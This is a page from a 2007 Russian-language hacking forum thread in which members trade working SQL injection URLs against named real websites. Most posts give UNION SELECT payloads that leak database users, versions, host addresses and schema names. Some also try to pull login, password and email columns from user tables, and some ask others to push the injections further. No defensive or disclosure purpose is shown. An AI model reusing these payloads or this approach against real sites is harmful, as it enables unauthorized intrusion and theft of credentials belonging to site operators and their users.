ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3221  
Старый 02.10.2007, 01:07
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Цитата:
Сообщение от Tyc00n  
Раскрутите)

Код:
http://www.schleuderwelt.com/print.php?printpage='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

код:

http://www.schleuderwelt.com/print.php?printpage=-9999999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,concat_ws(0x3a,version(),user( ),database()),21,22,23,24,25,26,27/*

Дальше сам ройся,я спать...
 
Ответить с цитированием

  #3222  
Старый 02.10.2007, 15:07
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Секас
Код:
http://www.lovemagia.ru/product_show.php?lid= 7&sid=-20+union+s elect+1/*
Версия - 4.0.26-log
 
Ответить с цитированием

  #3223  
Старый 02.10.2007, 21:27
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

http://www.bankpersonal.dp.ua

код:

http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(table_name,0x3a,column_ name),4+from+information_schema.columns/*

код:

http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat_ws(0x3a,passw,login,nam e,id),4+from+job_catvip/* <--- это единственное интересное что я нашел,

а вот в этой ---> http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(0x3a,passw,login,name,i d),4+from+bank_kiev.auth/* почему-то нет вывода



первый раз вижу вывод в такой форме
код:

http://www.profnavigator.ru/tmpl2.php?PN=doct.php&dout=text&dsubj=22&dtype=4&n id=-1608+union+select+concat_ws(0x3a,version(),user(), database()),2/* кто нить встречал такое???

Последний раз редактировалось fobofob; 02.10.2007 в 22:10..
 
Ответить с цитированием

  #3224  
Старый 03.10.2007, 00:47
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

Мну непонял чо сервак от него хочед! Вот вам на растерзание
PHP+MSSQL
http://www.super.md/?t=statall&id=0&time=3+OR+1=@@version--

Ошибка выполнения SQL запроса: statsGeneral 0xce8add383ab3a840178eb487785dc2f6,0,3 OR 1=@@version--,NULL,1,4096
 
Ответить с цитированием

  #3225  
Старый 03.10.2007, 08:54
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net

http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
 
Ответить с цитированием

  #3226  
Старый 03.10.2007, 13:01
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

_http://www.nikita.ru/javagames/index.php?wrub=-422+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(), 0x71),0x71),3,4,5/*
 
Ответить с цитированием

  #3227  
Старый 03.10.2007, 17:30
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

www.softprom.com
Код:
http://www.softprom.com/products.phtml?subcategory_id=-71'+union+select+user(),2/*
user:root@localhost.rm1.softprom.ua
 
Ответить с цитированием

  #3228  
Старый 03.10.2007, 21:15
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Цитата:
Сообщение от Calcutta  
http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7
4.0.20-standard-log:ntu:ntu@reasonb.srv.lexi.net

http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_s chema),3,4,5,6,7+from+information_schema.tables+li mit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?
сам же вывел версию ветки..откуда здесь information_schema.tables
 
Ответить с цитированием

  #3229  
Старый 04.10.2007, 13:03
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

То есть ты просто заменил ключевые слова языка SQL на CHAR(...)? ))) Жесть... Так нельзя делать! На то они и ключевые слова языка, они не могут быть заменены ничем, ни возвращаемым значением функции, ни значаением возвращаемым подзапросом и т.д. Он тебе лепит ошибку только потому, что у тебя ошибка в синтаксисе запроса. Если парсятся ключевые слова в параметре, то тут уже ты ничего не сделаешь. Получатся некие пасхальные яйца от la2.acrossworld.ru - вроде как инъекция есть, но реализовать её нельзя.
 
Ответить с цитированием

  #3230  
Старый 04.10.2007, 15:05
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
Smile

Код:
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,concat(user(),0x3a,version(), 0x3a,database()),6,7,8/*
xxx@88.214.192.26:4.0.26:evro
Код:
http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,5,concat(login,0x3a, mail),7,8+from+users/*
Код:
http://www.salecap.com/order.php?action=buy&id=-1+union+select+1,concat(user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8/*
sale34re_dblogin@localhost:4.0.27-standard-log:sal
Код:
http://www.denezhki.com/ShowArticle.php?id=-1+union+select+1,2,concat(user(),0x3a,ve rsion(),0x3a,database()),4/*
rublikicom@81.177.16.131:4.1.21:rublikicom_den
Код:
http://www.duniacyber.com/advertises_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user(),0x3a,ve rsion(),0x3a,database()),14,1 5,16,17,18/*
cyber_admin@localhost:4.0.27-standard:cyber_dccsql
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 12 (пользователей: 0 , гостей: 12)
 


Быстрый переход




ANTICHAT.XYZ